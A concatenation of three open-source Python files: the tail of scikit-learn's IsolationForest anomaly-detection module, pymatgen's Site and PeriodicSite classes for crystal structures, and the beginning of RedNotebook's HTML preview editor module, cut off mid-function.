n_features_ : int
The number of features when ``fit`` is performed.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
Notes
-----
The implementation is based on an ensemble of ExtraTreeRegressor. The
maximum depth of each tree is set to ``ceil(log_2(n))`` where
:math:`n` is the number of samples used to build the tree
(see (Liu et al., 2008) for more details).
References
----------
.. [1] Liu, Fei Tony, Ting, Kai Ming and Zhou, Zhi-Hua. "Isolation forest."
Data Mining, 2008. ICDM'08. Eighth IEEE International Conference on.
.. [2] Liu, Fei Tony, Ting, Kai Ming and Zhou, Zhi-Hua. "Isolation-based
anomaly detection." ACM Transactions on Knowledge Discovery from
Data (TKDD) 6.1 (2012): 3.
See Also
----------
sklearn.covariance.EllipticEnvelope : An object for detecting outliers in a
Gaussian distributed dataset.
sklearn.svm.OneClassSVM : Unsupervised Outlier Detection.
Estimate the support of a high-dimensional distribution.
The implementation is based on libsvm.
sklearn.neighbors.LocalOutlierFactor : Unsupervised Outlier Detection
using Local Outlier Factor (LOF).
Examples
--------
>>> from sklearn.ensemble import IsolationForest
>>> X = [[-1.1], [0.3], [0.5], [100]]
>>> clf = IsolationForest(random_state=0).fit(X)
>>> clf.predict([[0.1], [0], [90]])
array([ 1, 1, -1])
"""
@_deprecate_positional_args
def __init__(self, *,
n_estimators=100,
max_samples="auto",
contamination="auto",
max_features=1.,
bootstrap=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False):
super().__init__(
base_estimator=ExtraTreeRegressor(
max_features=1,
splitter='random',
random_state=random_state),
# here above max_features has no links with self.max_features
bootstrap=bootstrap,
bootstrap_features=False,
n_estimators=n_estimators,
max_samples=max_samples,
max_features=max_features,
warm_start=warm_start,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose)
self.contamination = contamination
def _set_oob_score(self, X, y):
raise NotImplementedError("OOB score not supported by iforest")
def _parallel_args(self):
# ExtraTreeRegressor releases the GIL, so it's more efficient to use
# a thread-based backend rather than a process-based backend so as
# to avoid suffering from communication overhead and extra memory
# copies.
return _joblib_parallel_args(prefer='threads')
def fit(self, X, y=None, sample_weight=None):
"""
Fit estimator.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Use ``dtype=np.float32`` for maximum
efficiency. Sparse matrices are also supported, use sparse
``csc_matrix`` for maximum efficiency.
y : Ignored
Not used, present for API consistency by convention.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Returns
-------
self : object
Fitted estimator.
"""
X = self._validate_data(X, accept_sparse=['csc'])
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
rnd = check_random_state(self.random_state)
y = rnd.uniform(size=X.shape[0])
# ensure that max_sample is in [1, n_samples]:
n_samples = X.shape[0]
if self.contamination != 'auto':
if not(0. < self.contamination <= .5):
raise ValueError("contamination must be in (0, 0.5], "
"got: %f" % self.contamination)
if isinstance(self.max_samples, str):
if self.max_samples == 'auto':
max_samples = min(256, n_samples)
else:
raise ValueError('max_samples (%s) is not supported.'
'Valid choices are: "auto", int or'
'float' % self.max_samples)
elif isinstance(self.max_samples, numbers.Integral):
if self.max_samples > n_samples:
warn("max_samples (%s) is greater than the "
"total number of samples (%s). max_samples "
"will be set to n_samples for estimation."
% (self.max_samples, n_samples))
max_samples = n_samples
else:
max_samples = self.max_samples
else: # float
if not 0. < self.max_samples <= 1.:
raise ValueError("max_samples must be in (0, 1], got %r"
% self.max_samples)
max_samples = int(self.max_samples * X.shape[0])
self.max_samples_ = max_samples
max_depth = int(np.ceil(np.log2(max(max_samples, 2))))
super()._fit(X, y, max_samples,
max_depth=max_depth,
sample_weight=sample_weight)
if self.contamination == "auto":
# 0.5 plays a special role as described in the original paper.
# we take the opposite as we consider the opposite of their score.
self.offset_ = -0.5
return self
# else, define offset_ wrt contamination parameter
self.offset_ = np.percentile(self.score_samples(X),
100. * self.contamination)
return self
def predict(self, X):
"""
Predict if a particular sample is an outlier or not.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
is_inlier : ndarray of shape (n_samples,)
For each observation, tells whether or not (+1 or -1) it should
be considered as an inlier according to the fitted model.
"""
check_is_fitted(self)
X = self._validate_data(X, accept_sparse='csr', reset=False)
is_inlier = np.ones(X.shape[0], dtype=int)
is_inlier[self.decision_function(X) < 0] = -1
return is_inlier
def decision_function(self, X):
"""
Average anomaly score of X of the base classifiers.
The anomaly score of an input sample is computed as
the mean anomaly score of the trees in the forest.
The measure of normality of an observation given a tree is the depth
of the leaf containing this observation, which is equivalent to
the number of splittings required to isolate this point. In case of
several observations n_left in the leaf, the average path length of
a n_left samples isolation tree is added.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
scores : ndarray of shape (n_samples,)
The anomaly score of the input samples.
The lower, the more abnormal. Negative scores represent outliers,
positive scores represent inliers.
"""
# We subtract self.offset_ to make 0 be the threshold value for being
# an outlier:
return self.score_samples(X) - self.offset_
def score_samples(self, X):
"""
Opposite of the anomaly score defined in the original paper.
The anomaly score of an input sample is computed as
the mean anomaly score of the trees in the forest.
The measure of normality of an observation given a tree is the depth
of the leaf containing this observation, which is equivalent to
the number of splittings required to isolate this point. In case of
several observations n_left in the leaf, the average path length of
a n_left samples isolation tree is added.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples.
Returns
-------
scores : ndarray of shape (n_samples,)
The anomaly score of the input samples.
The lower, the more abnormal.
"""
# code structure from ForestClassifier/predict_proba
check_is_fitted(self)
# Check data
X = self._validate_data(X, accept_sparse='csr', reset=False)
# Take the opposite of the scores as bigger is better (here less
# abnormal)
return -self._compute_chunked_score_samples(X)
def _compute_chunked_score_samples(self, X):
n_samples = _num_samples(X)
if self._max_features == X.shape[1]:
subsample_features = False
else:
subsample_features = True
# We get as many rows as possible within our working_memory budget
# (defined by sklearn.get_config()['working_memory']) to store
# self._max_features in each row during computation.
#
# Note:
# - this will get at least 1 row, even if 1 row of score will
# exceed working_memory.
# - this does only account for temporary memory usage while loading
# the data needed to compute the scores -- the returned scores
# themselves are 1D.
chunk_n_rows = get_chunk_n_rows(row_bytes=16 * self._max_features,
max_n_rows=n_samples)
slices = gen_batches(n_samples, chunk_n_rows)
scores = np.zeros(n_samples, order="f")
for sl in slices:
# compute score on the slices of test samples:
scores[sl] = self._compute_score_samples(X[sl], subsample_features)
return scores
def _compute_score_samples(self, X, subsample_features):
"""
Compute the score of each samples in X going through the extra trees.
Parameters
----------
X : array-like or sparse matrix
Data matrix.
subsample_features : bool
Whether features should be subsampled.
"""
n_samples = X.shape[0]
depths = np.zeros(n_samples, order="f")
for tree, features in zip(self.estimators_, self.estimators_features_):
X_subset = X[:, features] if subsample_features else X
leaves_index = tree.apply(X_subset)
node_indicator = tree.decision_path(X_subset)
n_samples_leaf = tree.tree_.n_node_samples[leaves_index]
depths += (
np.ravel(node_indicator.sum(axis=1))
+ _average_path_length(n_samples_leaf)
- 1.0
)
scores = 2 ** (
-depths
/ (len(self.estimators_)
* _average_path_length([self.max_samples_]))
)
return scores
def _more_tags(self):
return {
'_xfail_checks': {
'check_sample_weights_invariance':
'zero sample_weight is not equivalent to removing samples',
}
}
def _average_path_length(n_samples_leaf):
"""
The average path length in a n_samples iTree, which is equal to
the average path length of an unsuccessful BST search since the
latter has the same structure as an isolation tree.
Parameters
----------
n_samples_leaf : array-like of shape (n_samples,)
The number of training samples in each test sample leaf, for
each estimators.
Returns
-------
average_path_length : ndarray of shape (n_samples,)
"""
n_samples_leaf = check_array(n_samples_leaf, ensure_2d=False)
n_samples_leaf_shape = n_samples_leaf.shape
n_samples_leaf = n_samples_leaf.reshape((1, -1))
average_path_length = np.zeros(n_samples_leaf.shape)
mask_1 = n_samples_leaf <= 1
mask_2 = n_samples_leaf == 2
not_mask = ~np.logical_or(mask_1, mask_2)
average_path_length[mask_1] = 0.
average_path_length[mask_2] = 1.
average_path_length[not_mask] = (
2.0 * (np.log(n_samples_leaf[not_mask] - 1.0) + np.euler_gamma)
- 2.0 * (n_samples_leaf[not_mask] - 1.0) / n_samples_leaf[not_mask]
)
return average_path_length.reshape(n_samples_leaf_shape)
| anntzer/scikit-learn | sklearn/ensemble/_iforest.py | Python | bsd-3-clause | 18,708 | [
"Gaussian"
] | 3adbda9bc4dbaa50c46b58650401e683714883f94f1a88defe98525b135cdd20 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines classes representing non-periodic and periodic sites.
"""
import collections
import json
from typing import Optional, Tuple, Union
import numpy as np
from monty.dev import deprecated
from monty.json import MontyDecoder, MontyEncoder, MSONable
from pymatgen.core.composition import Composition
from pymatgen.core.lattice import Lattice
from pymatgen.core.periodic_table import DummySpecies, Element, Species, get_el_sp
from pymatgen.util.coord import pbc_diff
from pymatgen.util.typing import ArrayLike, SpeciesLike, CompositionLike
class Site(collections.abc.Hashable, MSONable):
"""
A generalized *non-periodic* site. This is essentially a composition
at a point in space, with some optional properties associated with it. A
Composition is used to represent the atoms and occupancy, which allows for
disordered site representation. Coords are given in standard cartesian
coordinates.
"""
position_atol = 1e-5
def __init__(
self,
species: Union[SpeciesLike, CompositionLike],
coords: ArrayLike,
properties: dict = None,
skip_checks: bool = False,
):
"""
Creates a non-periodic Site.
:param species: Species on the site. Can be:
i. A Composition-type object (preferred)
ii. An element / species specified either as a string
symbols, e.g. "Li", "Fe2+", "P" or atomic numbers,
e.g., 3, 56, or actual Element or Species objects.
iii.Dict of elements/species and occupancies, e.g.,
{"Fe" : 0.5, "Mn":0.5}. This allows the setup of
disordered structures.
:param coords: Cartesian coordinates of site.
:param properties: Properties associated with the site as a dict, e.g.
{"magmom": 5}. Defaults to None.
:param skip_checks: Whether to ignore all the usual checks and just
create the site. Use this if the Site is created in a controlled
manner and speed is desired.
"""
if not skip_checks:
if not isinstance(species, Composition):
try:
species = Composition({get_el_sp(species): 1})
except TypeError:
species = Composition(species)
totaloccu = species.num_atoms
if totaloccu > 1 + Composition.amount_tolerance:
raise ValueError("Species occupancies sum to more than 1!")
coords = np.array(coords)
self._species: Composition = species # type: ignore
self.coords: np.ndarray = coords # type: ignore
self.properties: dict = properties or {}
def __getattr__(self, a):
# overriding getattr doens't play nice with pickle, so we
# can't use self._properties
p = object.__getattribute__(self, "properties")
if a in p:
return p[a]
raise AttributeError(a)
@property
def species(self) -> Composition:
"""
:return: The species on the site as a composition, e.g., Fe0.5Mn0.5.
"""
return self._species # type: ignore
@species.setter
def species(self, species: Union[SpeciesLike, CompositionLike]):
if not isinstance(species, Composition):
try:
species = Composition({get_el_sp(species): 1})
except TypeError:
species = Composition(species)
totaloccu = species.num_atoms
if totaloccu > 1 + Composition.amount_tolerance:
raise ValueError("Species occupancies sum to more than 1!")
self._species = species
@property
def x(self) -> float:
"""
Cartesian x coordinate
"""
return self.coords[0] # type: ignore
@x.setter
def x(self, x: float):
self.coords[0] = x # type: ignore
@property
def y(self) -> float:
"""
Cartesian y coordinate
"""
return self.coords[1] # type: ignore
@y.setter
def y(self, y: float):
self.coords[1] = y # type: ignore
@property
def z(self) -> float:
"""
Cartesian z coordinate
"""
return self.coords[2] # type: ignore
@z.setter
def z(self, z: float):
self.coords[2] = z # type: ignore
def distance(self, other) -> float:
"""
Get distance between two sites.
Args:
other: Other site.
Returns:
Distance (float)
"""
return np.linalg.norm(other.coords - self.coords)
def distance_from_point(self, pt) -> float:
"""
Returns distance between the site and a point in space.
Args:
pt: Cartesian coordinates of point.
Returns:
Distance (float)
"""
return np.linalg.norm(np.array(pt) - self.coords)
@property
def species_string(self) -> str:
"""
String representation of species on the site.
"""
if self.is_ordered:
return list(self.species.keys())[0].__str__()
sorted_species = sorted(self.species.keys())
return ", ".join(["{}:{:.3f}".format(sp, self.species[sp]) for sp in sorted_species])
@property # type: ignore
@deprecated(message="Use site.species instead. This will be deprecated with effect from pymatgen 2020.")
def species_and_occu(self):
"""
The species at the site, i.e., a Composition mapping type of
element/species to occupancy.
"""
return self.species
@property
def specie(self) -> Union[Element, Species, DummySpecies]:
"""
The Species/Element at the site. Only works for ordered sites. Otherwise
an AttributeError is raised. Use this property sparingly. Robust
design should make use of the property species instead. Note that the
singular of species is also species. So the choice of this variable
name is governed by programmatic concerns as opposed to grammar.
Raises:
AttributeError if Site is not ordered.
"""
if not self.is_ordered:
raise AttributeError("specie property only works for ordered " "sites!")
return list(self.species.keys())[0]
@property
def is_ordered(self) -> bool:
"""
True if site is an ordered site, i.e., with a single species with
occupancy 1.
"""
totaloccu = self.species.num_atoms
return totaloccu == 1 and len(self.species) == 1
def __getitem__(self, el):
"""
Get the occupancy for element
"""
return self.species[el]
def __eq__(self, other):
"""
Site is equal to another site if the species and occupancies are the
same, and the coordinates are the same to some tolerance. numpy
function `allclose` is used to determine if coordinates are close.
"""
if other is None:
return False
return (
self.species == other.species
and np.allclose(self.coords, other.coords, atol=Site.position_atol)
and self.properties == other.properties
)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
"""
Minimally effective hash function that just distinguishes between Sites
with different elements.
"""
return sum([el.Z for el in self.species.keys()])
def __contains__(self, el):
return el in self.species
def __repr__(self):
return "Site: {} ({:.4f}, {:.4f}, {:.4f})".format(self.species_string, *self.coords)
def __lt__(self, other):
"""
Sets a default sort order for atomic species by electronegativity. Very
useful for getting correct formulas. For example, FeO4PLi is
automatically sorted in LiFePO4.
"""
if self.species.average_electroneg < other.species.average_electroneg:
return True
if self.species.average_electroneg > other.species.average_electroneg:
return False
if self.species_string < other.species_string:
return True
if self.species_string > other.species_string:
return False
return False
def __str__(self):
return "{} {}".format(self.coords, self.species_string)
def as_dict(self) -> dict:
"""
Json-serializable dict representation for Site.
"""
species_list = []
for spec, occu in self.species.items():
d = spec.as_dict()
del d["@module"]
del d["@class"]
d["occu"] = occu
species_list.append(d)
d = {
"name": self.species_string,
"species": species_list,
"xyz": [float(c) for c in self.coords], # type: ignore
"properties": self.properties,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
}
if self.properties:
d["properties"] = self.properties
return d
@classmethod
def from_dict(cls, d: dict) -> "Site":
"""
Create Site from dict representation
"""
atoms_n_occu = {}
for sp_occu in d["species"]:
if "oxidation_state" in sp_occu and Element.is_valid_symbol(sp_occu["element"]):
sp = Species.from_dict(sp_occu)
elif "oxidation_state" in sp_occu:
sp = DummySpecies.from_dict(sp_occu)
else:
sp = Element(sp_occu["element"]) # type: ignore
atoms_n_occu[sp] = sp_occu["occu"]
props = d.get("properties", None)
if props is not None:
for key in props.keys():
props[key] = json.loads(json.dumps(props[key], cls=MontyEncoder), cls=MontyDecoder)
return cls(atoms_n_occu, d["xyz"], properties=props)
class PeriodicSite(Site, MSONable):
"""
Extension of generic Site object to periodic systems.
PeriodicSite includes a lattice system.
"""
def __init__(
self,
species: Union[SpeciesLike, CompositionLike],
coords: ArrayLike,
lattice: Lattice,
to_unit_cell: bool = False,
coords_are_cartesian: bool = False,
properties: dict = None,
skip_checks: bool = False,
):
"""
Create a periodic site.
:param species: Species on the site. Can be:
i. A Composition-type object (preferred)
ii. An element / species specified either as a string
symbols, e.g. "Li", "Fe2+", "P" or atomic numbers,
e.g., 3, 56, or actual Element or Species objects.
iii.Dict of elements/species and occupancies, e.g.,
{"Fe" : 0.5, "Mn":0.5}. This allows the setup of
disordered structures.
:param coords: Cartesian coordinates of site.
:param lattice: Lattice associated with the site.
:param to_unit_cell: Translates fractional coordinate to the
basic unit cell, i.e. all fractional coordinates satisfy 0
<= a < 1. Defaults to False.
:param coords_are_cartesian: Set to True if you are providing
cartesian coordinates. Defaults to False.
:param properties: Properties associated with the site as a dict, e.g.
{"magmom": 5}. Defaults to None.
:param skip_checks: Whether to ignore all the usual checks and just
create the site. Use this if the PeriodicSite is created in a
controlled manner and speed is desired.
"""
if coords_are_cartesian:
frac_coords = lattice.get_fractional_coords(coords)
else:
frac_coords = coords # type: ignore
if to_unit_cell:
frac_coords = np.mod(frac_coords, 1)
if not skip_checks:
frac_coords = np.array(frac_coords)
if not isinstance(species, Composition):
try:
species = Composition({get_el_sp(species): 1})
except TypeError:
species = Composition(species)
totaloccu = species.num_atoms
if totaloccu > 1 + Composition.amount_tolerance:
raise ValueError("Species occupancies sum to more than 1!")
self._lattice: Lattice = lattice
self._frac_coords: ArrayLike = frac_coords
self._species: Composition = species # type: ignore
self._coords: Optional[np.ndarray] = None
self.properties: dict = properties or {}
def __hash__(self):
"""
Minimally effective hash function that just distinguishes between Sites
with different elements.
"""
return sum([el.Z for el in self.species.keys()])
@property
def lattice(self) -> Lattice:
"""
Lattice associated with PeriodicSite
"""
return self._lattice
@lattice.setter
def lattice(self, lattice: Lattice):
"""
Sets Lattice associated with PeriodicSite
"""
self._lattice = lattice
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property # type: ignore
def coords(self) -> np.ndarray: # type: ignore
"""
Cartesian coordinates
"""
if self._coords is None:
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
return self._coords
@coords.setter
def coords(self, coords):
"""
Set Cartesian coordinates
"""
self._coords = np.array(coords)
self._frac_coords = self._lattice.get_fractional_coords(self._coords)
@property
def frac_coords(self) -> np.ndarray:
"""
Fractional coordinates
"""
return self._frac_coords # type: ignore
@frac_coords.setter
def frac_coords(self, frac_coords):
"""
Set fractional coordinates
"""
self._frac_coords = np.array(frac_coords)
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property
def a(self) -> float:
"""
Fractional a coordinate
"""
return self._frac_coords[0] # type: ignore
@a.setter
def a(self, a: float):
self._frac_coords[0] = a # type: ignore
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property
def b(self) -> float:
"""
Fractional b coordinate
"""
return self._frac_coords[1] # type: ignore
@b.setter
def b(self, b: float):
self._frac_coords[1] = b # type: ignore
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property
def c(self) -> float:
"""
Fractional c coordinate
"""
return self._frac_coords[2] # type: ignore
@c.setter
def c(self, c: float):
self._frac_coords[2] = c # type: ignore
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property
def x(self) -> float:
"""
Cartesian x coordinate
"""
return self.coords[0]
@x.setter
def x(self, x: float):
self.coords[0] = x
self._frac_coords = self._lattice.get_fractional_coords(self.coords)
@property
def y(self) -> float:
"""
Cartesian y coordinate
"""
return self.coords[1]
@y.setter
def y(self, y: float):
self.coords[1] = y
self._frac_coords = self._lattice.get_fractional_coords(self.coords)
@property
def z(self) -> float:
"""
Cartesian z coordinate
"""
return self.coords[2]
@z.setter
def z(self, z: float):
self.coords[2] = z
self._frac_coords = self._lattice.get_fractional_coords(self.coords)
def to_unit_cell(self, in_place=False) -> Optional["PeriodicSite"]:
"""
Move frac coords to within the unit cell cell.
"""
frac_coords = np.mod(self.frac_coords, 1)
if in_place:
self.frac_coords = frac_coords
return None
return PeriodicSite(self.species, frac_coords, self.lattice, properties=self.properties)
def is_periodic_image(self, other: "PeriodicSite", tolerance: float = 1e-8, check_lattice: bool = True) -> bool:
"""
Returns True if sites are periodic images of each other.
Args:
other (PeriodicSite): Other site
tolerance (float): Tolerance to compare fractional coordinates
check_lattice (bool): Whether to check if the two sites have the
same lattice.
Returns:
bool: True if sites are periodic images of each other.
"""
if check_lattice and self.lattice != other.lattice:
return False
if self.species != other.species:
return False
frac_diff = pbc_diff(self.frac_coords, other.frac_coords)
return np.allclose(frac_diff, [0, 0, 0], atol=tolerance)
def __eq__(self, other):
return (
self.species == other.species
and self.lattice == other.lattice
and np.allclose(self.coords, other.coords, atol=Site.position_atol)
and self.properties == other.properties
)
def __ne__(self, other):
return not self.__eq__(other)
def distance_and_image_from_frac_coords(
self, fcoords: ArrayLike, jimage: Optional[ArrayLike] = None
) -> Tuple[float, np.ndarray]:
"""
Gets distance between site and a fractional coordinate assuming
periodic boundary conditions. If the index jimage of two sites atom j
is not specified it selects the j image nearest to the i atom and
returns the distance and jimage indices in terms of lattice vector
translations. If the index jimage of atom j is specified it returns the
distance between the i atom and the specified jimage atom, the given
jimage is also returned.
Args:
fcoords (3x1 array): fcoords to get distance from.
jimage (3x1 array): Specific periodic image in terms of
lattice translations, e.g., [1,0,0] implies to take periodic
image that is one a-lattice vector away. If jimage is None,
the image that is nearest to the site is found.
Returns:
(distance, jimage): distance and periodic lattice translations
of the other site for which the distance applies.
"""
return self.lattice.get_distance_and_image(self.frac_coords, fcoords, jimage=jimage)
def distance_and_image(self, other: "PeriodicSite", jimage: Optional[ArrayLike] = None) -> Tuple[float, np.ndarray]:
"""
Gets distance and instance between two sites assuming periodic boundary
conditions. If the index jimage of two sites atom j is not specified it
selects the j image nearest to the i atom and returns the distance and
jimage indices in terms of lattice vector translations. If the index
jimage of atom j is specified it returns the distance between the ith
atom and the specified jimage atom, the given jimage is also returned.
Args:
other (PeriodicSite): Other site to get distance from.
jimage (3x1 array): Specific periodic image in terms of lattice
translations, e.g., [1,0,0] implies to take periodic image
that is one a-lattice vector away. If jimage is None,
the image that is nearest to the site is found.
Returns:
(distance, jimage): distance and periodic lattice translations
of the other site for which the distance applies.
"""
return self.distance_and_image_from_frac_coords(other.frac_coords, jimage)
def distance(self, other: "PeriodicSite", jimage: Optional[ArrayLike] = None):
"""
Get distance between two sites assuming periodic boundary conditions.
Args:
other (PeriodicSite): Other site to get distance from.
jimage (3x1 array): Specific periodic image in terms of lattice
translations, e.g., [1,0,0] implies to take periodic image
that is one a-lattice vector away. If jimage is None,
the image that is nearest to the site is found.
Returns:
distance (float): Distance between the two sites
"""
return self.distance_and_image(other, jimage)[0]
def __repr__(self):
return "PeriodicSite: {} ({:.4f}, {:.4f}, {:.4f}) [{:.4f}, {:.4f}, " "{:.4f}]".format(
self.species_string, self.coords[0], self.coords[1], self.coords[2], *self._frac_coords
)
def as_dict(self, verbosity: int = 0) -> dict:
"""
Json-serializable dict representation of PeriodicSite.
Args:
verbosity (int): Verbosity level. Default of 0 only includes the
matrix representation. Set to 1 for more details such as
cartesian coordinates, etc.
"""
species_list = []
for spec, occu in self._species.items():
d = spec.as_dict()
del d["@module"]
del d["@class"]
d["occu"] = occu
species_list.append(d)
d = {
"species": species_list,
"abc": [float(c) for c in self._frac_coords], # type: ignore
"lattice": self._lattice.as_dict(verbosity=verbosity),
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
}
if verbosity > 0:
d["xyz"] = [float(c) for c in self.coords]
d["label"] = self.species_string
d["properties"] = self.properties
return d
@classmethod
def from_dict(cls, d, lattice=None) -> "PeriodicSite":
"""
Create PeriodicSite from dict representation.
Args:
d (dict): dict representation of PeriodicSite
lattice: Optional lattice to override lattice specified in d.
Useful for ensuring all sites in a structure share the same
lattice.
Returns:
PeriodicSite
"""
species = {}
for sp_occu in d["species"]:
if "oxidation_state" in sp_occu and Element.is_valid_symbol(sp_occu["element"]):
sp = Species.from_dict(sp_occu)
elif "oxidation_state" in sp_occu:
sp = DummySpecies.from_dict(sp_occu)
else:
sp = Element(sp_occu["element"]) # type: ignore
species[sp] = sp_occu["occu"]
props = d.get("properties", None)
if props is not None:
for key in props.keys():
props[key] = json.loads(json.dumps(props[key], cls=MontyEncoder), cls=MontyDecoder)
lattice = lattice if lattice else Lattice.from_dict(d["lattice"])
return cls(species, d["abc"], lattice, properties=props)
| richardtran415/pymatgen | pymatgen/core/sites.py | Python | mit | 23,358 | [
"pymatgen"
] | 37c0fdfe4dd344810a50420131e6ec1f74df2a5f0d0dc6d1b7201693f8aec794 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Copyright (c) 2009 Jendrik Seipp
#
# RedNotebook is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# RedNotebook is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with RedNotebook; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------
import sys
import os
import StringIO
import logging
import gtk
import pango
'''
Notes:
This module makes use of the keepnote gui module and especially its richtext
submodule.
It provides the HtmlEditor class which is used for previewing a day's text.
Later the richtext editing feature will be added.
Some code in this module has been taken from keepnote modules and was altered
to fit RedNotebook's needs. The original keepnote modules have not been altered
in any significant way. Only some imports where changed or commented out.
'''
from rednotebook.gui.keepnote.gui.editor import KeepNoteEditor
from rednotebook.gui.keepnote.gui.richtext import RichTextView, RichTextModTag, RichTextIO, \
HtmlError, RichTextError, RichTextImage, is_relative_file
from rednotebook.gui.keepnote.gui.richtext.richtext_html import HtmlBuffer, HtmlTagReader, \
HtmlTagWriter, unnest_indent_tags
from rednotebook.gui.keepnote.gui.richtext.textbuffer_tools import TagNameDom, TextBufferDom, \
iter_buffer_contents
from rednotebook.gui.keepnote.gui.richtext.richtext_tags import RichTextTag
from rednotebook.gui.keepnote.gui.richtext.richtextbuffer import ignore_tag
from rednotebook.util import filesystem
# these tags will not be enumerated by iter_buffer_contents
IGNORE_TAGS = set(["gtkspell-misspelled"])
def ignore_tag(tag):
return tag.get_property("name") in IGNORE_TAGS
class RichTextH3Tag(RichTextTag):
def __init__(self, kind):
RichTextTag.__init__(self, "h3")
self.kind = kind
class HtmlTagH3Reader(HtmlTagReader):
def __init__(self, io):
HtmlTagReader.__init__(self, io, "h3")
def parse_starttag(self, htmltag, attrs):
# self._io is a RedNotebookHtmlBuffer instance
self._io.append_text("\n")
self._io.append_child(TagNameDom('h3'), True)
def parse_endtag(self, htmltag):
self._io.append_text("\n")
class HtmlTagParReader(HtmlTagReader):
# paragraph
# NOTE: this tag is currently not used by KeepNote, but if pasting
# text from another HTML source, KeepNote will interpret it as
# a newline char
def __init__(self, io):
HtmlTagReader.__init__(self, io, "p")
self.paragraphs = 0
def parse_starttag(self, htmltag, attrs):
# Don't insert a newline at the beginning of a document
if self.paragraphs > 0:
self._io.append_text("\n")
self.paragraphs += 1
def parse_endtag(self, htmltag):
self._io.append_text("\n")
class RedNotebookHtmlBuffer(HtmlBuffer):
def __init__(self):
HtmlBuffer.__init__(self)
self.add_tag_reader(HtmlTagH3Reader(self))
# overwrite keepnote par reader
self.par_reader = HtmlTagParReader(self)
self.add_tag_reader(self.par_reader)
def read(self, html, partial=False, ignore_errors=False):
"""Read from stream infile to populate textbuffer"""
# Enable check if we're at the top of a document
self.par_reader.paragraphs = 0
#self._text_queue = []
self._within_body = False
self._partial = partial
self._dom = TextBufferDom()
self._dom_ptr = self._dom
self._tag_stack = [(None, self._dom)]
try:
self.feed(html)
self.close()
except Exception, e:
# reraise error if not ignored
if not ignore_errors:
raise
self.process_dom_read(self._dom)
return unnest_indent_tags(self._dom.get_contents())
class HtmlView(RichTextView):
def __init__(self):
RichTextView.__init__(self)
tag_table = self._textbuffer.get_tag_table()
tag_table.new_tag_class("h3", RichTextH3Tag)
# 14pt corresponds to h3
tag_table.tag_class_add("h3", RichTextModTag("h3", weight=pango.WEIGHT_BOLD, size_points=16))
self.connect("visit-url", self._on_visit_url)
self._html_buffer = RedNotebookHtmlBuffer()
self.enable_spell_check(False)
#print 'self.is_spell_check_enabled()', self.is_spell_check_enabled()
#self.set_editable(False)
def get_buffer(self):
return self._textbuffer
def _on_visit_url(self, textview, url):
logging.info('clicked %s' % url)
filesystem.open_url(url)
def highlight(self, text):
iter_start = self.get_buffer().get_start_iter()
# Hack: Ignoring the case is not supported for the search so we search
# for the most common variants, but do not search identical ones
variants = set([text, text.capitalize(), text.lower(), text.upper()])
for search_text in variants:
iter_tuple = iter_start.forward_search(search_text, gtk.TEXT_SEARCH_VISIBLE_ONLY)
# When we find one variant, highlight it and quit
if iter_tuple:
self.set_selection(*iter_tuple)
return
def set_selection(self, iter1, iter2):
'''
Sort the two iters and select the text between them
'''
sort_by_position = lambda iter: iter.get_offset()
iter1, iter2 = sorted([iter1, iter2], key=sort_by_position)
assert iter1.get_offset() <= iter2.get_offset()
self.get_buffer().select_range(iter1, iter2)
class HtmlIO(RichTextIO):
def __init__(self):
RichTextIO.__init__(self)
self._html_buffer = RedNotebookHtmlBuffer()
def load(self, textview, textbuffer, html):
"""Load buffer with data from file"""
# unhook expensive callbacks
textbuffer.block_signals()
spell = textview.is_spell_check_enabled()
textview.enable_spell_check(False)
textview.set_buffer(None)
# clear buffer
textbuffer.clear()
err = None
try:
#from rasmus import util
#util.tic("read")
buffer_contents = list(self._html_buffer.read(html))
#util.toc()
#util.tic("read2")
textbuffer.insert_contents(buffer_contents,
textbuffer.get_start_iter())
#util.toc()
# put cursor at begining
textbuffer.place_cursor(textbuffer.get_start_iter())
except IOError:
pass
except (HtmlError, IOError, Exception), e:
logging.error(e)
err = e
# TODO: turn into function
textbuffer.clear()
textview.set_buffer(textbuffer)
ret = False
else:
# finish loading
path = os.path.dirname(os.path.abspath(__file__))
self._load_images(textbuffer, path)
textview.set_buffer(textbuffer)
textview.show_all()
ret = True
# rehook up callbacks
textbuffer.unblock_signals()
textview.enable_spell_check(spell)
textview.enable()
textbuffer.set_modified(False)
# reraise error
if not ret:
raise RichTextError("Error loading '%s'." % 'html', e)
def save(self, textbuffer):
"""Save buffer contents to file"""
try:
buffer_contents = iter_buffer_contents(textbuffer, None, None, ignore_tag)
